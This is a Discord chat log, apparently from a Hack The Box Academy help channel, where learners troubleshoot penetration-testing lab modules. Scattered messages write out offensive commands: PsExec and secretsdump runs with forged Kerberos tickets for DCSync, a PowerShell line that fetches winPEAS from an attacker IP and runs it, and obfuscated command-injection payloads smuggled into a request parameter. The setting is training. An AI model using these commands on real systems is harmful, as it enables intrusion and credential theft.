Hi! Im in Skills Assessment of Password Attacks: I get initial foothold with the username b*** and the password given. After that I found the credentials of user h*** and pivot to J01. Then, the only thing I could think of was to use Snaffler, and it says I have access to FILES01, but when I try to get there from my host (I pivoted with ligolo), it tells me I don't have access.
I can't figure out how to get to the SMB of files01. Can anyone give me a clue?
Since it sounds like you can authenticate to the internal hosts, I'd take the time to enumerate the various types of access you can authenticate with.
I am confused
Intro to network traffic analysis
Interrogating network traffic with capture and display filter
what do i even do to answer the questions i dont see any file or anything
OHHH THE RESOURCES IM DUMB NVM
Thanks! This clue works for me!
how can I add color to text in sysreptor report...chatgpt is not helping
if I want to turn this code red...
Im stuck again. I found access to SMB in DC, but i didnt find anything interesting. I also tried accessing FILE01 with evil-winrm using h** and b** users, but I can't access it. I see the shares of FILE01 but i cant connect.
BRO
I recommend revisiting this section Credential Hunting in Network Shares
This is the kind of stuff i never get to learn
Because companies dont have Discord
They only have Active Directory and Azure
And GCP
This channel is for modules content. Feel free to move your discussion to #general
Contact discord support and refrain from discussing this any further in this channel. If your post was deleted, it was because it doesn't pertain to any HTB academy modules.
@lyric beacon As @cunning canopy said this is not the server for that. We do not condone illegal activity.
It doesn't let me say anything in general
Now, yes... I had forgotten how to connect to a Share from Windows LOL. Thank you!
hi i want to ask in password attacks skill assessment do i need at the first username-anarchy ?
In the Active Directory Enumeration & Attacks module and Attacking Domain Trusts - Child -> Parent Trusts - from Linux section, why is the IP of child domain provided when we have to attack from linux attackhost which is connected to the internal subnet that contains the domains. Also, it states SSH into the child domain whereas there is no ssh port open there. Thanks.
It says to ssh into the attacker machine
for the module "Automating Payloads & Delivery with Metasploit" the question says to Authenticate to 10.129.69.251 (ACADEMY-SHELLS-WIN10MSF) with user "htb-student" and password "HTB_@cademy_stdnt!"
tried to ssh but it doesnt work, how should i go about doing this?
network issue
rightt cuz its windows...
thkss a lot
I know, but please read after that. Also, what's the purpose of giving IP for the child domain.
somehow it still doesnt work
You have no text after "it states ssh into the child domain" -- it doesn't it says ssh into the attacker machine.
Wrap the password in single quotes
i did in the 2nd command
can you ping the target
yes
It doesn't say that directly, but after comma why is that line written?
Not sure what that has to do with anything i said
Are you using the pwnbox at the same time as the VPN?
I see, I'm looking at the page now. Did you complete the 1st question?
yes
So you have a shell then. What's the issue finding the answer to the 2nd question?
tried using pwnbox only but still unable to restarting instance now to retry
i just looked at the resource above to answer haha
If you use the pwnbox and vpn at the same time you'll have network issues because they share the same IP. The first question requires obtaining a system shell. From there you can get the 2nd question's answer
I clearly understand what you're saying (I have already solved the question) but you're not telling me the reason for providing the child domain IP separately and the part which I shared in the screenshot above. Thanks.
The IP is provided so it makes it easier so you don't have to find it yourself? not sure
i am currently using only pwnbox but still same issue
It looks network related to me. Maybe try resetting everything and starting fresh.
Could also try changing servers or regions if need be
Okk lemme try
If we have to use the attackbox as stated in the question, that's because it's dual-homed and the domains are in the internal subnet 172.16.5.x.
Yes I know that, what's your point
The reason for separately providing the child domain IP as seen in the screenshot.
Not sure what you're asking or getting at here. Your question originally was "why does it give us the IP", for convenience. your 2nd question was "ssh into the child domain but i can't" but I explained it doesn't say that, it says to ssh into the attacker box. Am I misunderstanding something here?
It doesn't make sense to give it for convenience when we have to perform it using the attackbox. Secondly, I was referring to the line after comma, that what does it indicate.
If they did not provide the IP, you would have to scan for it. Just because the system is connected to another subnet doesn't mean you know the IP of the DC. Not sure what you mean with your 2nd question please rephrase
the line after the comma is the IP of DC02
If it was for convenience, then they forgot to provide the IP of DC01, the parent domain that we need to compromise ultimately. This is the confusion I seek clarification for. Thanks for your help by the way, appreciate it.
hi! please help with module https://academy.hackthebox.com/module/143/section/1457
I'm going through the material again, checking various exploitation methods after receiving a parent domain ticket.
so, I managed to get a ticket and execute ls \\...\c$. then I try to configure DCSync using mimikatz, specifying the precision of the command in the module, and I get an error.
how to fix the problem?
I don't know the answer sorry
Read the last part of the section
No worries, thanks again.
hahaha)) I specified the parent domain in the command before, but for some reason it didn't work. thanks!))
I can try to request the command line through PsExec using my ticket. I read in the Internet that it should work like that. But it doesn't let me in. same thing, I can't do Enter-PSSession. that is, I can only do DCSync?
Idk. Looks like you made the user yourself, so they'll have perms to whatever you gave them
I didn't create the user, it's a non-existent hacker user, for ExtraSids Attack
In next module, I see using psexec.py
https://academy.hackthebox.com/module/143/section/1508
but I can't use flags -k -no-pass in Windows version)
I think it's just that Impacket’s psexec.py uses a different method of execution that relies on SMB access (which you have), not SCM rights (which your forged ticket lacks).
great point!
I thought so too and found psexec from Impacket: https://github.com/maaaaz/impacket-examples-windows
I tried to execute the following command
.\psexec.exe LOGISTICS.INLANEFREIGHT.LOCAL/hacker@acad...t.local -k -no-pass -target-ip 172.16.5.5
I get the error
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
I want, as in the next module, to get an interactive shell from Windows on the parent domain controller using the received ticket, at least somehow: .\PsExec (PsTools) or .\PsExec (Impacket) or Enter-PSSession ...
I’d say specify the FQDN and shuffle it around if all params are already correct.
Make sure that the user you're authenticating as actually exists on the box if you have a way to.
hi @knotty granite !
I am trying to perform ExtraSids Attack from module https://academy.hackthebox.com/module/143/section/1457. on the following page https://academy.hackthebox.com/module/143/section/1508, when attacking from Linux, psexec from Impacket is used. There is a non-existent user hacker used there
# PsExec (PsTools)
.\PsExec.exe \\academy-ea-dc01.inlanefreight.local -u LOGISTICS\hacker cmd.exe
.\PsExec.exe \\academy-ea-dc01.inlanefreight.local cmd /c "whoami /all"
# PsExec (Impacket)
.\psexec.exe \\academy-ea-dc01.inlanefreight.local
.\psexec.exe LOGISTICS.INLANEFREIGHT.LOCAL/hacker@academy-ea-dc01.inlanefreight.local -k -no-pass -target-ip 172.16.5.5
# Enter-PSSession (Powershell)
Enter-PSSession -ComputerName academy-ea-dc01.inlanefreight.local
in all cases i failed. the ticket is valid, I can success do ls \\academy-ea-dc01.inlanefreight.local\c$
the goal is simple - get an interactive shell on the parent domain controller from Windows host, using ticket, got after ExtraSids Attack
Ok I did a bit of studying but I’ll continue after this of course
What I think is maybe you should switch up your tool to remote to the box. If you got a golden ticket or what not via ExtraSids attack (an attack I’ve never heard of nor seen executed) and it’s valid, then try other tools to remote as your target user.
Any ideas on what tools can be used?
Evil-winrm and psexec (via Linux) were the first two things in mind while looking at your case
Guys I have an issue in the bash script module
GNU nano 8.4 log.sh
#!/bin/bash
var="8dm7KsjU28B7v621Jls"
value="ERmFRMVZ0U2paTlJYTkxDZz09Cg"
for i in {1..40}
do
    var=$(echo $var | base64)
    #<---- If condition here:
    if [[ $var == $value ]]
    then
        echo "Var is equal to value"
    else
        echo "Var isn't equal to value"
    fi
    if [[ ${#var} -gt 113450 ]]
    then
        echo -n "$var" | tail -c 20
    else
        :
    fi
done
This is my script for the Comparison Operators exercise what can I modify it ?
So what’s the real issue like the output and stuff and the goal?
I recommend removing the : at this part
else
:
fi
done
It provides me a value but htb says it isn't the right answer
Well the script can be improved that’s one thing I do know because I never done this module but I’ll try to help as best as I can
Add quotes to the variables that are in your if conditions
Maybe also try printing out your variables when saying “var isn’t equal to value”
you wrote that you have never heard of such an attack? what is it called then? it is an attack on the parent domain, the SID history is forged. I took the name of the attack from the training materials
Oh no it’s a real attack. My apologies for the confusion. What I meant was I’ve never like seen anything like it because lack of experience. It’s new to me which makes me want to learn it.
I’m not doing that module nor have I done it therefore I am not a knower.
okay
I came across a similar question on the htb forum, the person also received a TGT ticket and was unable to execute PsExec. It would be good to have such a skill in own arsenal, since in complex networks it may not always be possible to perform terminal from own Linux host
https://forum.hackthebox.com/t/ad-trusts-modules-psexec-access-is-denied/312552
I am doing the AD Trusts module on the ADCS section where you have to make a certificate template vulnerable to ESC1 and request a certificate on behalf of the user tom. I have gone through all of the steps and got the tgt for tom however when i try to use PsExec to get the flag i get an access denied. I have checked and the tom ticket is loade...
yeesss
I finally succeeded. I don't know what happened, but I succeeded.
How did you achieve it? Share please.
I was able to connect to the interactive shell through PsExec (PsTools). Before executing the command, it is better to refresh TGT once again
.\PsExec64.exe \\academy-ea-dc01.inlanefreight.local cmd.exe
.\PsExec64.exe \\academy-ea-dc01.inlanefreight.local -s cmd.exe
.\PsExec64.exe \\academy-ea-dc01.inlanefreight.local -s cmd /c "whoami /all"
failed to connect via PSSession. at the moment, it seems to me, the problem is in the infrastructure settings. here I found an example where in the same situation the connection is successful https://academy.hackthebox.com/module/253/section/2812
Here is the explanation I found for myself in this problem. but I am not sure if it is correct:
The fake TGT that was received has a PAC, but the SID may not map correctly on the target host for WinRM, so WinRM refuses to create a PowerShell session with the error
I have now a test laboratory from the CRTA certification, and active academy infra from the OSCP, as well as two examples from HTB. all labs on the topic AD Trust (attack parent DC from child). so the research is still ongoing))
That's awesome, keep us updated. Thanks.
okay
Skills Assessment - Password Attacks
after username anarchy how to pivot ?
bro you are working as a pentester?
a little)
I think its not good channel to talk here, i have to ask something...dm will be fine?
Ummm
I have done that assessment
But i dont remember exactly
You can dm me
Guys, I tried since 1 hour to get the flag on the Firewall IDS/IPS medium labs, and just checked the solution, and even using the command provided it doesn't show the flag ! How is this possible ?
Section link https://academy.hackthebox.com/module/19/section/118
I am having some issues SSH'ing into windows machines, found on the trust attacks modules. The first windows machine i.e. the SQL01 one is fine to ssh into, but all others no matter through proxychains or ligolo only allow a certain amount of lines then will repeat output on the last line, so i cant read ANY command output as its just immediately replaced with the next line, and finally just the prompt for c:\tools or wherever im at. I find what i'm having to do is remotely execute reverse shells on each one back through my ligolo listener, but this is tedious and from time to time i ctrl+c on the wrong window and lose my listener chain. Does anyone have any solution to the SSH issue?
I think I remember running into that issue and used the Pwnbox which didn't have the problem. I could be remembering a different thing than you're working on though because I don't remember the specific module.
Thats what it looks like, I don't have to want to use pwnbox its already slow enough from Australia
Yeah the pwnbox should do it. I remember trying to log the output of the command but it was messed up too, but you could try that.
rather chain revshells tbh
for the cpts exam would you recommend doing it on the pwnbox or on your own vm?
vm
there are interesting updates😄
I'm looking at another infrastructure, the exploitation of ExtraSids Attack is different a little. I exploit it from Linux, and there I can't create a valid TGT token through a non-existent user. The writeup says that I need to use an existing user and his id. And also specify the parameter -groups 516 -user-id <real_id_of_real_user>. Also in the parameter -extra-sid I need to add this to the sid for Enterprise Admins: ,S-1-5-9
I don't understand why this is so. Any ideas?
why?
better experience, tools already available, etc
Hey i have a question, i had a 44 weeks streak and i lost them this week due to traveling conditions is there anyway support can return them back ??
No probably not. Only support can answer, but I highly doubt they can/will do it.
Can i give it a try they might understand
Nothing stopping you from trying
can someone please tell me how to add coloured text in code segment in the report via sysreptor....
No, we can't
Anyone got a minute for https://academy.hackthebox.com/module/112/section/1078 Footprinting Easy ? This first assessment is considerably more different than what we've done thus far.
Ive got some screenshots to share with where im at and what im a little iffy on
nvm im dumb
nvm no im not. im only half dumb if someone HAS done the box i'd like to understand how it was expected of us to make a leap in logic that i eventually got to, to find the box...
Hit me up
or do they just purposely leave a breadcrumb but its like half ass-ish?
I continue testing that other infra. In general, it turned out that in the attack it is necessary to specify a real username, and also add a parameter with userid. Otherwise, the attack is identical
In the material on HTB it is written that the user name can be specified randomly. As it seems to me, this does not always work like that
That's interesting, I have no clue on that actually too.
Im seriously confused by this module idk what im doing wrong, anyone open to help out,
Like a valid user must exist in the domain for the attack to work. In HTB, it's mentioned the user doesn't even have to exist.
There must be at least one user in the domain. I have never seen a domain without users) But for an attack, maybe with special settings, you need to specify an existing username
Maybe some extra validations are in place on PAC by the DC which doesn't let a non-existent account forge TGT. Just my opinion though.
Is there anyone I can ask about the API Attacks Module "Broken Object Property Level Authorization" Area. I'm going crazy.
Cheers!
In the module "pentesting in a nutshell" -> Section "Windows System enumeration" I've now tried several times to get the winpeas.ps1 file from my atacking machine onto the windows target machine via RDP + powershell (as provided in the course). but the actual "get"-command (or its windows equivalent)seems to fail constantly. Does anyone else experience this? 🙂
Sorry for late ping but what type of shell were you using on the virtual host to run the PsExec64 executable?
And could your prior errors be because you were missing key arguments and such?
Congratulations on solving the problem
🛜
more likely
Can you show an example of the error message
hey i am doing the vulnerability assessment module, i have the openVPN running the academy regular. once i connect to the greenbone security assistant through firefox i have a about 2 minutes and then it disconnects me, this makes running the assignment a drag
is this a hackthebox server issue thing ??
I don't remember anymore) the problem was solved partly. In fact, I can't execute evil-winrm, netexec, etc, with generated tgt. it's not a big problem because I can make dcsync from linux, and can make psexec from linux with generated tgt
maybe you know what the problem is😄
no error, the python-server even shows the status code 200 :D. on the target machine the ps-command simply takes forever. IF i misspell the file, it instantly provides the problem, but if I do it correctly, its stuck. I've tried pwnbox AND VPN (with kali linux in this case):
Hi
Try with the following, instead of invoking it as an expression:
C:\> iwr -uri http://10.10.14.200:8080/winPEAS.ps1 -o winpeas.ps1
C:\> . .\winpeas.ps1
Can someone give me role so i can write in #general i need support help related to billing and my account
this worked right away
(well, to be fair: I still cannot get the System Information section....maybe thats a hint towards the root of my initial problem?
@urban sage @surreal rain help please
Reach out to support via the website, the discord server is not meant to assist with billing related inquiries
I did, site says something went wrong
When i try to contact
Need to speak to a person? Learn how to reach our support via HTB Labs.
Is it just me or a pivoting module requires the honorable mention of ligolo? I have finished some tasks without extra steps provided in the module because ligolo is like VPN, not HTTPs or anything
When you guys pipx install a python tool, and that tool needs root privileges to execute, do you guys just create an alias that calls sudo with the absolute path of the binary instead of installing the tool in the roots local bin PATH AND the user's local bin that you are using? Or maybe there is even a solution for this problem that I am unaware of? The only reason I ask is because putting my user's local bin in root's PATH seems like it would be a security concern and double downloading the tool to both also seems like a poor idea for management later.
Oh well, as long as you were able to make it work is all that matters. I’ll try to figure out what went wrong in my meantime if I can because that attack method is pretty rare in Active Directory as far as I know.
I’ll go study it…
So I did some of these a couple of times and some times the SSH connection worked great and other times it didn't. My way around the times it didn't was to use the SSH creds to enable RDP on DC02 and then just RDP'd into it and used PS. Maybe that can help. If you have any questions about it, feel free to DM.
That's a good idea, I think I'm past it now but thankyou
in the step-by-step solution it says that winpeas should be able to provide this section (in contrast to systeminfo ), but as you can see on my screenshot, the system-info section on winpeas is also not showing 😄
Are you trying to save the file to the disk or run it in-memory? Also, you're already in powershell so no need to write powershell in the command.
I have (successfully) "downloaded" the ps1-script to a writeable folder on the target machine (simply in accordance with the modules guide)
so I'm not sure how to answer your first question 😄
As for your second remark: I also wondered about this, but check the modules textline:
this has the issue, right? Already being in powershell but still explicitly using the "powershell" command
hi everyone
I'm trying to add a script to zap to use it in fuzzer, but it doesn't work
if I run fuzzer with a custom script, the progress bar just doesn't move and stays at 0%
can you tell me if there are any special conditions for the script?
here's my script:
import base64
def processPayload(value):
    b64 = base64.b64encode(value.encode('utf-8'))
    return b64.hex()
and second question:
I don't really understand the third task in Skills Assessment - Using Web Proxies
I made a script that substitutes the last character in cookies, encrypts and sends, but the response from the server is the same everywhere
how do I know that I have selected the correct cookie?
It simply spawns another PowerShell, executes winPEAS.ps1 directly from the attacker’s HTTP server, and save whatever output it prints to winpeas.txt. That's what it's doing essentially.
If you review the file winpeas.txt, you'll see the result of the script winPEAS.ps1.
ah, thanks for the explanation 🙂 It seems THAT did not work out too well. BUT i think this explains the very long runtime / waiting time. maybe i need to wait 5-10 minutes for the "download" to finish. BUT the fact that "system information" cannot be gathered by winPEAS doesnt change, right?^^"
im currently on Linux Fundamentals : User Management where it teaches about creating users and such, it's telling me to test this out on the target system, but the "htb-student" user cant use sudo? and does not have perms to create users? am i missing something? every time i try its just telling me that i'm now reported haha. help.
I don’t think they want you to create a user on the machine unless they’re like asking for a flag or an answer to a question.
Try it in your own personal machine maybe?
I have these questions, but i guess i can solve them without messing around in the terminal. I'm not really comfortable to be messing around with perms on my PC yet. Thanks for your answer tho.
https://academy.hackthebox.com/module/77/section/852
In this module, do I have to hunt for a listing IP or can i use port 9443
Just bought the silver 🥈 annual...
you can use any port on your system provided it's not already bound to some service
How would I find those ports?
netstat -a
Thank you!
I am looking for some help in Active Directory Penetration Tester Path: Windows Lateral Movement - Skill assessment - Q2. Found the DC but still can't get into Arturo account.
anyone here did/is doing Linux Fundamentals module?
File Transfer module, wsgidav usage, I managed to figure out I could just request the exact file I wanted in the exact folder I specify using powershell, but I was never able to actually make the shell command dir \\<attacker-IP>\DavWWWRoot work like they explained in the module. I keep getting the Network path was not found error. Same with copy even if I specify the exact location without DavWWWRoot copy \\<attacker-IP>\testfile.txt I know connections can be made because this syntax to get the file works perfectly with Invoke-WebRequest on powershell. What am I missing?
Hi Chat, in PKI - ESC1, of Windows Attacks & Defense, how are you copy pasting the certificate ? I tried both using vim or nano to create the cert.pem file with the output of the certify command (with both the certificate and the key), then i parse it with sed, then use openssl to transform it in an cert.pfx. But when i use rubeus with the cert.pdf i get a "KDC_ERR_PADATA_TYPE_NOSUPP" error instead of "you did it you beautiful"
You can DM me if you don’t get it figured out and I can help in a bit
Hey Guys,
Someone knows how to go through this skills assessment: https://academy.hackthebox.com/module/297/section/3421
It's stating there's no need to connect through SSH, but I couldn't find any link to the web application.
Thank you for your help
anyone else having trouble doing rdp? I get this error
yo guys im on AD enum, attacking domain trusts child->parent from linux (aka golden ticket)
ive forged a ticket with the enterprise admin's SID passed as SID history parameter using ticketer.py
and now i want to dump nt hash from the bross user
im using this
```
└──╼ $secretsdump.py inlanefreight.local/yosef@172.16.5.240 -k -no-pass -just-dc-user bross
Impacket v0.9.24.dev1+20211013.152215.3fe2d73a - Copyright 2021 SecureAuth Corporation
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[*] Something wen't wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning up...
```
but i think im doing something wrong
i also can get a shell using psexec.py
still stuck here. here's another ss
hey team, I'm just now learning about eyewitness in the modules, from my understanding it's limited to application discovery, how do you guys use it?
Is the Code box broken?
Your VM is separate from your PC and doesn't affect your host. You can create a snapshot, mess around and revert to it, because you can't really create users or add them to groups on the pwnbox.
I see, I will have to learn how to create a VM after i have completed the Linux Fundamentals
this i believe is a tls problem..how are you connecting to the RDP
yea, i have done it
this does not require you to test the commands, going through the man page is enough
pwnbox horribly slow no ?
Anyone for an extremely gentle nudge on https://academy.hackthebox.com/module/112/section/1079 Footprinting medium lab? I have what I need im just unable to make use of it ?
using xfreerdp and pwnbox in the browser. This was working last week
let me try in vm
nono i need the command
yes xfreerdp from pwnbox in browser is slow this has mostly always been the case tho when ive used it
what command you are using..
ideally it should be something like
xfreerdp /u:htb-student /p:HTB_@cademy_stdnt! /v:10.129.151.78 /cert:ignore
xfreerdp /u:Administrator /p:"$$$$$$" /v:10.129.101.245
doesnt work in vm too
lemme try yours
i think cert ignore is important which probably you're missing because of which you're getting untrusted tls error
no luck
it says NLA failed now this is a different error than before if you notice, i would suggest just try to reset the target box and try again if not, ensure the correct passwords are being put..
Hello all i need some advice, I've completed my BBH path around 80%, and the modules being removed are remaining, as im planning to take CWSE exam, should i skip those and continue these modules?
New modules:
- Web Fuzzing
- API Attacks
- Attacking GraphQL
- Attacking Common Applications
Removed modules:
- Web Service & API Attacks
- Session Security
- Hacking WordPress
Hi, I was doing Advanced Command Obfuscation section of Command Injection module i am really stuck at this module. I've been trying to bypass it for a while. this is what i have done till now
i ran 127.0.0.1%0a{t'ai'l,index.php} which did return ?> means i have successfully bypassed t'ai'l similarly g're'p .only thing left was to bypass | , HTB mentions that use <<< instead of | this is what i did
ip=127.0.0.1%0at'ai'l%09<<<$(g're'p%09"input"%09index.php) it was fine until here but when i run to command below to test a nested grep command it it is not displaying any output other than ping results ip=127.0.0.1%0at'ai'l%09<<<$(g're'p%09mysql<<<$(g're'p%09"input"%09index.php)) i also tried with "$(g're'p%09mysql<<<"$(g're'p%09"input"%09index.php)")" please help me if i am missing something obvious or if i am on a wrong path
your password is wrong
im doing an assessment right now and i have one user who works just fine xfreerdp, trying a different and password fails
likely because i have the wrong password, im getting an ssl cert error
so im in the HTB setting up process, exploring the terminal emulator and i am using wavelength (or rather on that section) i go to open bashrc and the file doesnt exist nor will it let me source or create one?
any help would be so much appreciated, extremely new to this
still looking for a lil nudge on https://academy.hackthebox.com/module/112/section/1079 im all in the weeds here.
Not familiar with the module so do you need access to the .bashrc file for the module or is it optional?
optional 🙂 just trying to wrap my head around all of this (this is going to be my future) lol
and i am trying to understand just about everything i can before i start school in october
Anyone know a module with airgeddon
Need help With DACL Attacks II Skills Assessment Q3.
I have NTLM hashes for all users. Passwords for all users except t****i. I need a nudge in the right direction to get to the last flag, if any one has completed this.
Nevermind I managed to figure it out 😅
Wi-Fi Evil Twin Attacks has a section about airgeddon
Ty is that the only one?
the only one i know about. you can search Academy too
Well just know the bashrc file is just like a configuration script that sets environment variables and creates alias.
If it is optional in regards to the module then I wouldn’t bang my head on it so much. Just know that it’s not too important to understand unless it’s a requirement to the module or your interests.
understood! thank you @knotty granite
Does no one really have the answer to this? Genuinely DO NOT understand even remotely why it isnt working.
Guys please help me 😭 🙏
to my knowledge you cant reference UNC paths like that. i think you need to pushd (then popd when done)
ask chat gpt about the EOF marker and adding a line or something. You might be getting caught up with an extra line somewhere i dont know this info to be of much more help but i was having problems any time i tried to use the ... whats it called here strings and heredocs
EOF terminator
I did ask chatgpt and claude @quiet trout
Hello everyone i on the footprinting module at the smtp part. I am using metasploit's smtp enumeration script with the file that is given in the resources. But i don't get any results and i don't get why
So this is under the SMB uploads section, should I be running both the SMB server from impacket AND the webDAV server so that when one fails to connect the other will connect?
can you dm me a screenshot?
link to the section you're on? I just did these yesterday
shoot me a dm with your screenshots im not sure i follow if you're doing this from linux terminal its gonna be different but you need to basically mount the shares if possible thats what pushd popd does (push a directory... map to drive letter)
sent it
i think i am doing the right thing but i get no results so i am confused
I didnt use metasploit for this i used purely uh openssl s_client i believe.
oh right to enum
i used the smtp-user-enum binary mentioned in the module
oh i will check that out then but i would think this would work too haha thanks anyway
its not working only for me?: " If we hover the mouse over the respective options, a small window will appear with an explanation. These explanations will also be found in other modules, which should help us if we are not yet familiar with one of the tools."
its easier. its described in the section and works the same
sorry i had the metasploit option misconfigured to the wrong word list
now i got it i am so sorry for wasting your time have a good one 😅
This question is still on the table if anyone else wants to give an attempt at answering it. Been stuck here all day.
My new best guess is that IEESC is configured on the target device, blocking outgoing http requests. I deduced this because it was also messing up my WebClient requests in powershell. If anyone can confirm this, let me know, otherwise im moving on
Hi, anyone who has completed the Skills Assessment - Password Attacks, I'm stuck near the end, I think, and I don't know what to do with the user stom.
Anyone who HAS the CPTS were the modules enough to prepare you?
absolutely
go in order
no, the last one is AEN which is the capstone. the 2nd to last is documentation and reporting, which is about how to write up a report and document findings, not about note taking
you're free to take them in any order you want, but some of the modules build off of previous knowledge
Hi! Can someone help me with the Advanced XSS and CSRF Exploitation Skills Assessment? I am stuck with File Upload, I am moderator
Active Directory Enumeration & Attacks : DCSync
Scenario Setup
In this section, we will move back and forth between a Windows and Linux attack host as we work through the various examples. You can spawn the hosts for this section at the end of this section and RDP into the MS01 Windows attack host with the credentials htb-student:Academy_student_AD!. For the portion of this section that requires interaction from a Linux host (secretsdump.py) you can open a PowerShell console on MS01 and SSH to 172.16.5.225 with the credentials htb-student:HTB_@cademy_stdnt!. This could also likely be done all from Windows using a version of secretsdump.exe compiled for Windows as there are several GitHub repos of the Impacket toolkit compiled for Windows, or you can do that as a side challenge.
password wrong idk why
I am new on this. Recommend where to start. Basics for a beginner
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
It's accessible but you need to follow the instructions in #welcome to gain access.
Cheers will take a look 👍🏻
.
Hmm account sign up, will look later 👀
I don't speak much English
Language?
French
Comment va votre soirée?
English only please
ah ok no problem
Also this isn't #general, this channel is for discussion of the modules on Academy. Please take the general convo there.
Have this real time translator im trying out, thought I'd test a new language. Haha lol, haven't sorted my general out 😉. I get you though 👌🏻, you guys have a nice evening
Anyone for a quick sanity check on https://academy.hackthebox.com/module/112/section/1080
Footprinting lab -hard
I have a question why can't I use the VIP machines, and I have the VIP plan?
You'd have to ask support on the website, no support is provided on Discord
All good, but those guys aren't answering.
Hey! currently doing the Job Role path in preparation for the exam, I am currently doing the skill assessment within "Attacking Common Services" however I really struggled with the "easy" one and even needed a peek at the solution. It is kinda demotivating to me that I still can't do an easy skill assessment without needing a nudge. Any advice?
not much other than its "normal" and "ok"
Take a look instead at what youre missing from the solution
My major contention with the annual writeups is they dont generally lead you to discover the solution
A -> C while not showing B
Methodology is probably the key most thing for learning
i rdp to
Active Directory Enumeration & Attacks : DCSync
i rdp to the MS01 and SSH to 172.16.5.225 with the credentials htb-student:HTB_@cademy_stdnt! but i get pass wrong
so i think the problem in HTB hosts setup
How are you trying to paste? In powershell, paste is just ctrl+v
yes CTRL + v
if u see in the pic i test the paste of the password
i also update my vpn config + download new one. reset the machine and try again but same problem
Try a different vpn region?
ok
not work
i will use windows impacket compiled bins as alternative so no need for linux host
Which module are you working in?
pivoting using a socks proxy when config the burp using that proxy . proxy >> setting proxy >> connection >> socks
use ligolo-ng for better
And when you have 4/5 host? In different subnets? How you can manage it?
I'm officially almost giving up on the sliver module
Hey, was away from my computer for the weekend. Yes, I am! Could I DM?
rip to masoudredteamer
Super et vous
keep it english
I don't speak English 😓
Hahaha Anglais please, upsets the mods. Good to hear though man
Hence me saying it causes upset lol. I'm a rule abiding member 
Anyone up to help with a little nudge on Foot printing lab hard
https://academy.hackthebox.com/module/112/section/1080
I'm at the finish line here just cant seem to get there
nvm i was stuck on stupid i had all i needed it was just organized in a manner to throw me off
What do you need?
Can anyone help me with Password Attacks John The Ripper second question
```
john --wordlist=/usr/share/wordlists/rockyou.txt hash
Loaded 2 password hashes with no different salts (LM [DES 128/128 SSE2])
Warning: poor OpenMP scalability for this hash type, consider --fork=12
Will run 12 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:01 100% 0g/s 6870Kp/s 6870Kc/s 13741KC/s (JESTER..*7¡V
Session completed
```
This is what I get as a response
Using the format also does not help
```
john --wordlist=/usr/share/wordlists/rockyou.txt --format=ripemd-128 hash
Unknown ciphertext format name requested
```
the hash file contains the given hash:
193069ceb0461e1d40d216e32c79c704
The Unknown ciphertext format name requested error indicates an issue with the --format option. ripemd-128 normally should work. You can check the ripemd formats your john supports by using john --list=formats | tr , '\n' | grep ripemd. If there is no ripemd-128 or if it is under a different name, there could be a version problem. I'm just guessing though
Can you give me some advice, I'm going through the SQL Injection Fundamentals | reading files module, I got to the test task, but I don't understand what actions are required of me there.
We see in the above PHP code that '$conn' is not defined, so it must be imported using the PHP include command. Check the imported page to obtain the database password.
Ctrl+V gives the same error to me as well. Use mouse right click or manually type the password.
Can you provide more detail
best to say which section/question you're on
I got to the output of the php file
```php
<?php
if (isset($_GET["port_code"])) {
    // port_code from the query string is concatenated straight into the SQL statement
    $q = "Select * from ports where code like '%".$_GET["port_code"]."%'";
    $result = mysqli_query($conn, $q);
    if (!$result) {
        die("</table></div><p style='font-size: 15px'>".mysqli_error($conn)."</p>");
    }
    while ($row = mysqli_fetch_array($result)) {
        echo "<tr><td style='width:400px' colspan=3>".$row[1]."</td><td style='width:400px' colspan=3>".$row[2]."</td><td style='width:450px' colspan=3>".$row[3]."</tr>";
    }
}
?>
```
After which the task says:
We see in the above PHP code that '$conn' is not defined, so it must be imported using the PHP include command. Check the imported page to obtain the database password.
I don't understand what is required of me.
always say the section you're on along with the module and question
Sorry, SQL Injection Fundamentals | reading files
I don't think you have the right file
There should be a lot more in the source, look for the php file it calls to
you are only showing the very bottom of the page (i don't need to see it) just review the entire source code
...
@gritty rover Good job. Deleted your post though as it contained the answer on how to solve the question.
how am i supposed to complete modules if i cant even spawn stuff? oh can directly access them
You have to look for a configuration file in the webroot /var/www/html to find the database password. The hint is in the source code.
i am stuck at advanced command obfuscation section of command injections module this is what i have done till now
ip=127.0.0.1%0at'ai'l<<<"$(g're'p%09mysql<<<"$(g're'p%09root<<<"$(${PATH:0:1}usr${PATH:0:1}share)")")" is this payload is equivalent to tail -n 1 <<< grep mysql <<< grep root << /usr/share for the context i have to run this command /usr/share/ | grep root | grep mysql | tail -n 1 the thing is grep, tail and | are blocked. grep is working after g're'p so did t'ai'l . htb suggest to use <<< instead of |
Tip: Note that we are using <<< to avoid using a pipe |, which is a filtered character.
but to work with <<< we have to use tail first ig to everything needs to reverse this is how grep should have worked in this command? note that i have use t'ai'l not t'ai'l%09-n%091 because it is adding unnecessary filter if i get the results of tail i'll add filter later
i also tried base64 encoding
ip=127.0.0.1%0a$bash<<<$(base64%09-d<<<dCdhaSdsPDw8IiQoZydyZSdwJTA5cm9vdDw8PCIkKGcncmUncCUwOW15c3FsPDw8IiQobHMsJHtQQVRIOjA6MX11c3Ike1BBVEg6MDoxfXNoYXJlKSIpIiki) this outputs invalid output while above one gave ping results
i did even tried reversing command
127.0.0.1%0a$(rev<<<'")")")erahs}1:0:HTAP{$rsu}1:0:HTAP{$,sl($"<<<lqsym90%p"er"g($"<<<toor90%p"er"g($"<<<l"ia"t') but no results
even tried encoding the above command
ip=127.0.0.1%0a$bash<<<$(base64%09-d<<<JChyZXY8PDwnIikiKSIpZXJhaHN9MTowOkhUQVB7JHJzdX0xOjA6SFRBUHskLHNsKCQiPDw8bHFzeW05MCVwImVyImcoJCI8PDx0b29yOTAlcCJlciJnKCQiPDw8bCJpYSJ0Jyk=)
but no results
read the whole source code and try to understand where is $conn defined once you find it try to read the file.
Yes, I have already figured it out, thank you. But I have another question.
I am taking the Skills Assessment - SQL Injection Fundamentals. The thing is that I have passed the final task, but I cannot understand why:
